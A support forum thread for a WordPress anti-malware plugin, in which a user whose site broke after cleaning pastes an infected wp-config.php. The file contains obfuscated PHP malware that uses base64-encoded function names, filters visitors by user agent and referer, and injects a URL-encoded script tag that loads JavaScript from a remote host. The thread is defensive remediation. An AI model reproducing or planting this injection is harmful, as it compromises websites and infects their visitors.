Home Forums Support Forum HTTP ERROR 500

This topic contains 3 replies, has 2 voices, and was last updated by  Anti-Malware Admin 5 years, 4 months ago.

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
  • #2206

    Ken Rhodes

    Got error after hit the clean button. Pressed undo as the box stayed red but crashed the browser.
    Cant access my site at all now.
    Please advise.
    Error as below  is currently unable to handle this request.
    HTTP ERROR 500″


    Anti-Malware Admin
    Key Master

    I see that it is fixed now. Can you tell me what file was broken?

    If you can send me the original content for that file then I can update the definitions so that it will not break that file again.


    Ken Rhodes

    I changed the name of the WP-Config.php in Cpanel and re uploaded the database SQL to WordPress log in.

    WP-Config.php is now in quarantine, this was the contents:


    /** DB Credentials removed to protect the user’s data */

    /**#@-*/$GLOBALS['_in_']=Array(base64_decode(‘ZX’ .’Jyb3J’ .’fcmVwb3′ .’J0aW5n’),base64_decode(‘aW5p’ .’X3Nld’ .’A==’),base64_decode(‘bWt0aW1l’),base64_decode(‘c2V0′ .’Y29′ .’va’ .’2ll’),base64_decode(‘ZGF’ .’0′ .’ZV9kZWZhdW’ .’x0′ .’X’ .’3′ .’RpbWV6b25lX3Nld’ .’A’ .’==’),base64_decode(‘cHJ’ .’lZ19t’ .’YXRjaF9′ .’hbGw=’),base64_decode(‘c3Ry’ .’dG9′ .’sb3dlcg==’),base64_decode(‘Y’ .’XJyYX’ .’lf’ .’bWVyZ’ .’2U=’),base64_decode(‘YXJ’ .’zb3′ .’J0′),base64_decode(” .’cHJlZ19t’ .’YX’ .’RjaA=’ .’='),base64_decode(” .’c’ .’H’ .’JlZ19t’ .’YXRjaA==’),base64_decode(” .’c’ .’HJlZ’ .’1′ .’9tYXRj’ .’aA’ .’==’),base64_decode(‘cHJl’ .’Z19′ .’tYXR’ .’j’ .’aA==’),base64_decode(‘cH’ .’J’ .’lZ19tYXRjaA’ .’==’)); ?><? function in($i){$a=Array(” .’ZG’ .’lzc’ .’Gx’ .’heV9l’ .’cn’ .’Jvc’ .’nM=’,'b2Zm’,'c’ .’2x’ .’fbWVzc’ .’2FnZQ==’,'c2xfbWVzc’ .’2FnZQ==’,” .’YWRtaW4=’,” .’L’ .’w==’,'RXVyb3BlL01vc2′ .’Nvd’ .’w==’,'LyhbYS’ .’16XX’ .’sxLDh9KD86LV’ .’thLXpdezEsOH0′ .’pPyko’ .’Pzo7′ .’cT0oWz’ .’AtOS5′ .’dKykpPy8=’,'S’ .’FRUU’ .’F9B’ .’Q0NFUF’ .’Rf’ .’TE’ .’FO’ .’R1VBR’ .’0U’ .’=',” .’L2JvdC9p’,'SFR’ .’UU’ .’F9′ .’VU’ .’0VSX0FHR’ .’U5U’,'L2′ .’dvb2′ .’ds’ .’ZS58c2VhcmN’ .’oLnx’ .’5YW’ .’hvb3′ .’xi’ .’aW5nfG1z’ .’b’ .’i9p’,'SFRUUF’ .’9′ .’SRU’ .’Z’ .’FUkV’ .’S',’L3J1fHVhfGJ’ .’lfGt’ .’rfHN’ .’yfGJ’ .’nL2k=’,'SFRUUF’ .’9S’ .’RUZFUkV’ .’S',’c2x’ .’f’ .’bW’ .’Vzc2F’ .’nZQ=’ .’=',’L3J1fHVrfG’ .’JlfGtr’ .’f’ .’HNyf’ .’GJnL2k=’,'L2′ .’ZyfHVrfHVzfGdif’ .’GN’ .’hfGF1fGl0fHNlf’ .’G’ .’V’ .’ufGV’ .’z’ .’L2k’ .’=');return base64_decode($a[$i]);} ?><?php $GLOBALS['_in_'][0](round(0));$GLOBALS['_in_'][1](in(0),in(1));function l__0(){if(empty($_COOKIE[in(2)])){$_0=$GLOBALS['_in_'][2](round(0),round(0),round(0),round(0+1),round(0+0.5+0.5),round(0+404.4+404.4+404.4+404.4+404.4));$GLOBALS['_in_'][3](in(3),in(4),$_0,in(5),$_1);}}$GLOBALS['_in_'][4](in(6));$GLOBALS['_in_'][5](in(7),$GLOBALS['_in_'][6]($_SERVER[in(8)]),$_2);$_3=$GLOBALS['_in_'][7]($_2[round(0+0.2+0.2+0.2+0.2+0.2)],$_2[round(0+0.66666666666667+0.66666666666667+0.66666666666667)]);foreach($_3 as $_4 => $_5)$_3[$_4]=$_5?$_5:round(0+1);$GLOBALS['_in_'][8]($_3);$_6=$_3[round(0)];if(!$GLOBALS['_in_'][9](in(9),$_SERVER[in(10)])AND $GLOBALS['_in_'][10](in(11),$_SERVER[in(12)])AND!$GLOBALS['_in_'][11](in(13),$_SERVER[in(14)])AND empty($_COOKIE[in(15)])AND!$GLOBALS['_in_'][12](in(16),$_6)AND $GLOBALS['_in_'][13](in(17),$_6)){ ?><script type=”text/javascript”><!–

    document.write(unescape(‘%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%75%6E%64%75%6B%2E%6F%72%67%2F%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E’));//–></script><?php }l__0();



    * WordPress Database Table prefix.


    * You can have multiple installations in one database if you give each a unique

    * prefix. Only numbers, letters, and underscores please!


    $table_prefix  = ‘wp_’;


    * For developers: WordPress debugging mode.


    * Change this to true to enable the display of notices during development.

    * It is strongly recommended that plugin and theme developers use WP_DEBUG

    * in their development environments.


    define(‘WP_DEBUG’, false);

    /* That’s all, stop editing! Happy blogging. */

    /** Absolute path to the WordPress directory. */

    if ( !defined(‘ABSPATH’) )

    define(‘ABSPATH’, dirname(__FILE__) . ‘/’);

    /** Sets up WordPress vars and included files. */

    require_once(ABSPATH . ‘wp-settings.php’);


    Anti-Malware Admin
    Key Master

    Thanks for posting this code. I have updated the definition of this threat so that it removes all of the malicious injection and does not leave behind any broken syntax.

Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.

Comments are closed.